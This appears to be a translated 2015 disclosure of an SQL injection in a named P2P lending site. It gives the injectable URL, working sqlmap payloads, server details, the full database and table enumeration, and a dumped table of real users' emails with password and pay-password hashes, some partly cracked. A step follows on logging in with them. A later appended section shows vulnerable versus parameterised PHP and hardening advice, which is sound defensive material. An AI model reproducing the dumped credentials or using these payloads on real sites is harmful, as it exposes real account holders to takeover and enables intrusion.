P2P lender Lihaodai has a SQL injection vulnerability; user information is exposed and can be used to log in
2015-12-27 09:24:32


Lihaodai is an online P2P investment and lending platform based in Xiamen, Fujian. According to its Baidu Baike entry, it was built by experienced investors together with several closely cooperating guarantee companies, applying their years of investment experience, big data and scientific risk-control technology.

1. Injection point: https://www.lihaodai.com/dyweb/dythemes/diyou/css/xsd/xsshow.php?xsRealName=admin (the xsRealName parameter is injectable)
Parameter: xsRealName (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: xsRealName=-8059' OR 1355=1355#
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: xsRealName=-1233' OR 1 GROUP BY CONCAT(0x716b716a71,(SELECT (CASE WHEN (1749=1749) THEN 1 ELSE 0 END)),0x7170627a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)
    Payload: xsRealName=admin' AND (SELECT * FROM (SELECT(SLEEP(5)))UtYI)#
---
[01:19:15] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 7.0 (wheezy)
web application technology: PHP 5.4.36, Apache 2.2.22
back-end DBMS: MySQL 5.0.12
2. All databases:
available databases [6]:
[*] information_schema
[*] lihaodai
[*] mysql
[*] performance_schema
[*] testtwolihaodai
[*] xuesheng
3. The 188 tables in the lihaodai database:
Database: lihaodai
[188 tables]
+---------------------------------+
| deayou_account                  |
| deayou_approve_realname         |
| deayou_users                    |
| deayou_users_info               |
| diyou_account                   |
| diyou_account_balance           |
| diyou_account_bank              |
| diyou_account_cash              |
| diyou_account_fee               |
| diyou_account_fee_type          |
| diyou_account_log               |
| diyou_account_payment           |
| diyou_account_recharge          |
| diyou_account_users             |
| diyou_account_users_bank        |
| diyou_account_web               |
| diyou_admin                     |
| diyou_admin_log                 |
| diyou_admin_login               |
| diyou_admin_type                |
| diyou_app_info                  |
| diyou_approve                   |
| diyou_approve_edu               |
| diyou_approve_edu_id5           |
| diyou_approve_id5               |
| diyou_approve_realname          |
| diyou_approve_sms               |
| diyou_approve_smslog            |
| diyou_approve_video             |
| diyou_areas                     |
| diyou_articles                  |
| diyou_articles_pages            |
| diyou_articles_type             |
| diyou_attestations              |
| diyou_attestations_type         |
| diyou_attestations_user         |
| diyou_borrow                    |
| diyou_borrow_activity           |
| diyou_borrow_amount             |
| diyou_borrow_amount_apply       |
| diyou_borrow_amount_log         |
| diyou_borrow_amount_type        |
| diyou_borrow_apply              |
| diyou_borrow_auto               |
| diyou_borrow_autolog            |
| diyou_borrow_care               |
| diyou_borrow_change             |
| diyou_borrow_change_rate        |
| diyou_borrow_count              |
| diyou_borrow_count_log          |
| diyou_borrow_credit             |
| diyou_borrow_fee                |
| diyou_borrow_fee_loan           |
| diyou_borrow_fee_log            |
| diyou_borrow_fee_type           |
| diyou_borrow_flag               |
| diyou_borrow_frost              |
| diyou_borrow_newtype            |
| diyou_borrow_preview            |
| diyou_borrow_recover            |
| diyou_borrow_repay              |
| diyou_borrow_roam               |
| diyou_borrow_style              |
| diyou_borrow_tender             |
| diyou_borrow_tender_auto        |
| diyou_borrow_tender_autolog     |
| diyou_borrow_tender_web         |
| diyou_borrow_type               |
| diyou_borrow_verify             |
| diyou_borrow_vouch              |
| diyou_borrow_vouch_recover      |
| diyou_borrow_vouch_repay        |
| diyou_borrow_youxuan            |
| diyou_borrow_youxuan_tender     |
| diyou_comment                   |
| diyou_comments                  |
| diyou_credit                    |
| diyou_credit_class              |
| diyou_credit_log                |
| diyou_credit_rank               |
| diyou_credit_type               |
| diyou_daily_bao                 |
| diyou_daily_log                 |
| diyou_dw_activity_review        |
| diyou_email                     |
| diyou_email_log                 |
| diyou_email_port                |
| diyou_email_sendlog             |
| diyou_exchange_log              |
| diyou_experience_cash           |
| diyou_experience_log            |
| diyou_goods                     |
| diyou_goods_type                |
| diyou_group                     |
| diyou_group_articles            |
| diyou_group_comments            |
| diyou_group_log                 |
| diyou_group_member              |
| diyou_group_type                |
| diyou_linkages                  |
| diyou_linkages_class            |
| diyou_linkages_type             |
| diyou_links                     |
| diyou_links_type                |
| diyou_message                   |
| diyou_message_receive           |
| diyou_modules                   |
| diyou_newspreads_cash_log       |
| diyou_newspreads_commission_log |
| diyou_newspreads_commission_set |
| diyou_newspreads_log            |
| diyou_newspreads_set            |
| diyou_newspreads_subsidy_log    |
| diyou_newspreads_users          |
| diyou_phone                     |
| diyou_phone_log                 |
| diyou_phone_port                |
| diyou_phone_smslog              |
| diyou_rating_assets             |
| diyou_rating_company            |
| diyou_rating_contact            |
| diyou_rating_educations         |
| diyou_rating_finance            |
| diyou_rating_houses             |
| diyou_rating_info               |
| diyou_rating_job                |
| diyou_red_envelope_config       |
| diyou_red_envelope_log          |
| diyou_remind                    |
| diyou_remind_log                |
| diyou_remind_type               |
| diyou_remind_user               |
| diyou_risk_account_log          |
| diyou_scrollpic                 |
| diyou_scrollpic_type            |
| diyou_site                      |
| diyou_site_menu                 |
| diyou_sms_type                  |
| diyou_spread_add                |
| diyou_spread_log                |
| diyou_spreads_log               |
| diyou_spreads_set               |
| diyou_spreads_settle_log        |
| diyou_spreads_users             |
| diyou_sysauto_auto              |
| diyou_sysauto_log               |
| diyou_system                    |
| diyou_ucenter                   |
| diyou_ucenter_set               |
| diyou_update_system             |
| diyou_users                     |
| diyou_users_admin               |
| diyou_users_admin_login         |
| diyou_users_admin_type          |
| diyou_users_adminlog            |
| diyou_users_care                |
| diyou_users_care_user           |
| diyou_users_email               |
| diyou_users_email_log           |
| diyou_users_examines            |
| diyou_users_friends             |
| diyou_users_friends_invite      |
| diyou_users_friends_type        |
| diyou_users_info                |
| diyou_users_log                 |
| diyou_users_login               |
| diyou_users_qq                  |
| diyou_users_rebut               |
| diyou_users_reglog              |
| diyou_users_return_log          |
| diyou_users_set                 |
| diyou_users_sina                |
| diyou_users_type                |
| diyou_users_upfiles             |
| diyou_users_vip                 |
| diyou_users_vip_bak             |
| diyou_users_viplog              |
| diyou_users_viplog_bak          |
| diyou_users_visit               |
| diyou_wechat_attention          |
| diyou_wechat_focususers         |
| diyou_wechat_material           |
| diyou_wechat_menu               |
| diyou_wechat_recovery           |
| diyou_wechat_sendmsg            |
| diyou_wechat_sendmsg_log        |
| diyou_wechat_set                |
| diyou_wechat_users              |
+---------------------------------+
4. Columns of the deayou_users table:
Database: lihaodai
Table: deayou_users
[14 columns]
+----------------+------------------+
| Column         | Type             |
+----------------+------------------+
| block_status   | int(1)           |
| email          | char(32)         |
| last_ip        | char(15)         |
| last_time      | int(10)          |
| logintime      | int(11)          |
| password       | char(32)         |
| paypassword    | varchar(100)     |
| reg_ip         | char(15)         |
| reg_time       | int(10)          |
| tuijian_userid | int(11)          |
| up_ip          | char(15)         |
| up_time        | int(10)          |
| user_id        | int(11) unsigned |
| username       | char(15)         |
+----------------+------------------+
5. Data from the email, password and paypassword columns (partial view only):
+-------------------+---------------------------------------------+----------------------------------+
| email             | password                                    | paypassword                      |
+-------------------+---------------------------------------------+----------------------------------+
| 100012191@qq.com  | 3b8403d686bbf542901925af2cabb01a            | NULL                             |
| 1000**55@qq.com   | d0dcbf0d12a6b1e7fbfa2ce5848f3eff (**123456) | 62649863c025d9577a1fa083ccfd371d |
| 1002294917@qq.com | ca0d88224e8e4ad38bbe0d361aa33f61            | c0d843406e43169a23124018992a77f7 |
| 1002631747@qq.com | 3030737f23dea935c4a7e399e56cf30d            | NULL                             |
| 1004548177@QQ.COM | 8bbda585acf997a32acb39564463ec43            | 5c47452c631dc649f799dfc259fd6f85 |
| 1005323954@qq.com | 7f247a14c68f54fd0314a5c3fdb02774            | NULL                             |
| 1005948568@qq.com | a125e96d56f565f75ba27804886eecb8            | NULL                             |
| 1005960185@qq.com | 8b164f1c39a90644b8e09f5760370574            | NULL                             |
| 1006085440@qq.com | b2661916664effefd6d81b4ace9f2167            | NULL                             |
| 1006635251@qq.com | 2a83ee66c34d5e683324fd81acec8301            | 315571c9e6d18d1224276f49501a13fd |
| 1006705924@qq.com | 0f7668f4f2760a810fd6590df15ceeb6            | NULL                             |
| 1007070@qq.com    | 0c9312e5144f08599bd13cc895dcde54            | NULL                             |
| 1007806535@qq.com | db109d7f3e07b2b9e6009e3ed4b352d8            | NULL                             |
| 1010354919@qq.com | 2ae19517e1a61dc7313a028252228746            | NULL                             |
| 1010832057@qq.com | 77f451ef7a1180b89390d72a3e605871            | 64006d7012790588829719f7c1894213 |
| 1012834191@qq.com | 1e566843372eabac85a2d353c13b4e18            | NULL                             |
| 1012@qq.com       | 7146ae0cc5e79ffad343632a432ebf08            | f01ea624e75b18b141a340f9f46d8542 |
| 1013190216@qq.com | 5a804ca36c543a14766ae1d3287ae675            | 0b85874fa48ec5fee3beeec26e358aa9 |
| 1013352481@qq.com | 6380212fca05f9676afd6f23ee0f4c80            | f6aec20d1dce52ad15c56a30326087af |
| 1014242060@qq.com | eb696f1b64c6a7ae0767d0a3176ecb53            | NULL                             |
| 101**18764@qq.com | 0eafe0ae2aa251fd0c5990274faa606b (1**506)   | NULL                             |
+-------------------+---------------------------------------------+----------------------------------+
6. Log in with the dumped data:

Solution:
Filter the parameter.
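As an added example, not code from the original report or from the Lihaodai site, the following shows the bug class behind item 1 (a GET parameter spliced into a SQL string) next to the hardened form that the "filter the parameter" remedy points at. The table name xs_student, its columns, the regex allow-list and the database credentials are assumptions made for illustration.

```php
<?php
// Added example (not the site's real xsshow.php): the defect class named in the
// report, a GET parameter concatenated into SQL, beside a hardened version.
// Table name xs_student and its columns are assumptions for illustration.

// --- Vulnerable pattern: the reported behaviour, the input becomes part of the SQL text ---
function lookupVulnerable(mysqli $db, string $xsRealName): array
{
    // A value such as  admin' AND (SELECT ...)#  is parsed as SQL, which is
    // exactly what the blind and error-based payloads in the report exploit.
    $sql = "SELECT xs_id, xs_realname, xs_school FROM xs_student "
         . "WHERE xs_realname = '$xsRealName'";
    $result = $db->query($sql);
    return $result ? $result->fetch_all(MYSQLI_ASSOC) : [];
}

// --- Hardened version: validate, then bind the value as data with a prepared statement ---
function lookupSafe(mysqli $db, string $xsRealName): array
{
    // Input validation: a real name is short and contains no SQL metacharacters.
    // The allow-list (Han characters, letters, the middle dot) is an assumption about this field.
    if (!preg_match('/^[\p{Han}\p{L}·]{1,30}$/u', $xsRealName)) {
        return [];
    }
    // Prepared statement: the driver fills the placeholder after the query is parsed,
    // so quotes, the # comment and SLEEP() inside the value never change the query.
    $stmt = $db->prepare(
        'SELECT xs_id, xs_realname, xs_school FROM xs_student WHERE xs_realname = ?'
    );
    $stmt->bind_param('s', $xsRealName);
    $stmt->execute();
    return $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
}

// Entry point mirroring the reported URL: xsshow.php?xsRealName=...
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); // driver errors become exceptions
try {
    // Dedicated read-only account limited to this one database (credentials are placeholders).
    $db = new mysqli('localhost', 'xsshow_ro', '<db-password-placeholder>', 'lihaodai');
    $db->set_charset('utf8mb4');

    $rows = lookupSafe($db, $_GET['xsRealName'] ?? '');
} catch (mysqli_sql_exception $e) {
    // Log server-side only; echoing driver error text to the client is what the
    // error-based technique in the report relies on.
    error_log('xsshow lookup failed: ' . $e->getMessage());
    http_response_code(500);
    exit;
}

header('Content-Type: application/json; charset=utf-8');
echo json_encode($rows, JSON_UNESCAPED_UNICODE);
```

Two further points the report's own output supports. The web application's database account could enumerate six databases including mysql and information_schema, so a single injection exposed far more than the page's own table; a per-application account with SELECT on only the tables it needs limits that blast radius, which is why the example connects as a separate read-only user. The password column is char(32) and the report shows plaintexts recovered from those hashes, so they are fast unsalted hashes; storing passwords with password_hash() and verifying with password_verify() would have kept a dumped table from turning directly into working logins, as step 6 demonstrates.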
